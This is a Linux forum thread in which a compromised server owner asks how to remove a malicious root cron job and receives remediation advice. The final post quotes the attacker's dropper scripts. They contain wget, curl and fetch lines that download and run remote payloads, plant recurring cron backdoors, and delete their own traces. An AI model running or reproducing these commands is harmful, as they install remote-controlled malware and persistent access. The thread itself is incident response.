How can i remove the cron made by "stablehost" valenrabilty?

Support for security such as Firewalls and securing linux
Post Reply
tomingy
Posts: 7
Joined: 2007/11/07 07:39:03

How can i remove the cron made by "stablehost" valenrabilty?

Post by tomingy » 2014/10/04 18:58:28

My box was just affected by

@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1

few hours ago. But i think i am safe now because my bash version is

Code: Select all

[root@fr02 cron]# rpm -q bash
bash-4.1.2-15.el6_5.2.x86_64
It created a cron under root. In /var/spool/cron/root , it has above syntax.

Code: Select all

[root@fr02 cron]# crontab -l
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
[root@fr02 cron]#
I tried to use crontab -e, use webmin to disable/remove, and even hard delete but all with no luck.

Code: Select all

in /var/spool/cron/root
...
-rw-------   1 root root  104 Oct  4 09:11 root
...
[root@fr02 cron]# rm root
rm: remove regular file `root'? y
rm: cannot remove `root': Permission denied
[root@fr02 cron]# echo '' > root
-bash: root: Permission denied
Is there a way to disable or remove it?

Thanks.

poky
Posts: 89
Joined: 2013/03/27 12:18:03

Re: How can i remove the cron made by "stablehost" valenrabi

Post by poky » 2014/10/04 22:20:55

Tray (before rm):
chattr -i -a root

User avatar
TrevorH
Forum Moderator
Posts: 23205
Joined: 2009/09/24 10:40:56
Location: Brighton, UK

Re: How can i remove the cron made by "stablehost" valenrabi

Post by TrevorH » 2014/10/04 22:23:30

If they have root access then you have no idea what else they have done. Your only safe option is to take that box off the net and reinstall it. It could have dozens of backdoors installed and you don't know any of them.

They had root access. They could have done anything to your machine. It might have a keylogger installed that's catching all your attempts to clean up. It could be sending your ssh keys and passwords out to who knows where...
CentOS 5 died in March 2017 - migrate NOW!
Full time Geek, part time moderator. Use the FAQ Luke

tomingy
Posts: 7
Joined: 2007/11/07 07:39:03

Re: How can i remove the cron made by "stablehost" valenrabi

Post by tomingy » 2014/10/05 03:22:48

poky wrote:Tray (before rm):
chattr -i -a root
Thank you. It worked.

tomingy
Posts: 7
Joined: 2007/11/07 07:39:03

Re: How can i remove the cron made by "stablehost" valenrabi

Post by tomingy » 2014/10/05 03:46:02

TrevorH wrote:If they have root access then you have no idea what else they have done. Your only safe option is to take that box off the net and reinstall it. It could have dozens of backdoors installed and you don't know any of them.

They had root access. They could have done anything to your machine. It might have a keylogger installed that's catching all your attempts to clean up. It could be sending your ssh keys and passwords out to who knows where...
I agreed what you said. I need to reinstall the box.

I did not notice my box was affected until i received an email from the Cron Daemon.
--2014-10-05 00:00:01-- http://stablehost.us/bots/regular.bot
Resolving stablehost.us... failed: No address associated with hostname.
wget: unable to resolve host address “stablehost.us”
Then i immediately check /tmp, it contains the following sh script which were all created few hours ago.
[root@fr02 tmp]# vi .pwn

wget http://www.computer-services.name/b.c -O /tmp/b.c;
curl -o /tmp/b.c http://www.computer-services.name/b.c;
fetch -o /tmp/b.c http://www.computer-services.name/b.c;
wget http://www.computer-services.name/b.c -O /tmp/.c;
curl -o /tmp/.c http://www.computer-services.name/.c;
fetch -o /tmp/.c http://www.computer-services.name/.c;
gcc -o .d /tmp/b.c
chmod +x /tmp/.c
/tmp/.c
/tmp/.d
rm -rf /tmp/.a /tmp/b.c /tmp/.c /tmp/.d

echo "@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2&1" >>/tmp/c
crontab /tmp/c
rm -rf /tmp/c
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
@daily wget http://xfsdfadsdgfs.tba.pw/update -O /tmp/update;sh /tmp/update;rm -rf /tmp/update
@daily wget http://update2.x24hr.com/update2 -O /tmp/update2;sh /tmp/update2;rm -rf /tmp/update2
@daily wget http://update.mrbonus.com/update3 -O /tmp/update3;sh /tmp/update3;rm -rf /tmp/update3
cron.weekly
#!/bin/sh
#wget http://stablehost.us/bots/regular.bot -O /tmp/sh
#curl -o /tmp/sh http://stablehost.us/bots/regular.bot
#sh /tmp/sh
#rm -rf /tmp/sh
img.sh
#!/bin/sh
starts=`pwd`
str=`date | md5sum | head -c8`
wget http://82.165.131.9/imgs.png -O $str;chmod +x $str;./$str;rm -rf $str
echo $str

echo "@daily wget http://xfsdfadsdgfs.tba.pw/update -O /tmp/update;sh /tmp/update;rm -rf /tmp/update">>/tmp/cc
echo "@daily wget http://update2.x24hr.com/update2 -O /tmp/update2;sh /tmp/update2;rm -rf /tmp/update2">>/tmp/cc
echo "@daily wget http://update.mrbonus.com/update3 -O /tmp/update3;sh /tmp/update3;rm -rf /tmp/update3">>/tmp/cc
crontab /tmp/cc
apt-get -y install bash&
yum -y update bash&
zypper --non-interactive update bash&


shred -f -u $starts/$0
rm -f $starts/$0
But it seems all hosts have been taken down. Then i run yum to update the bash.

Post Reply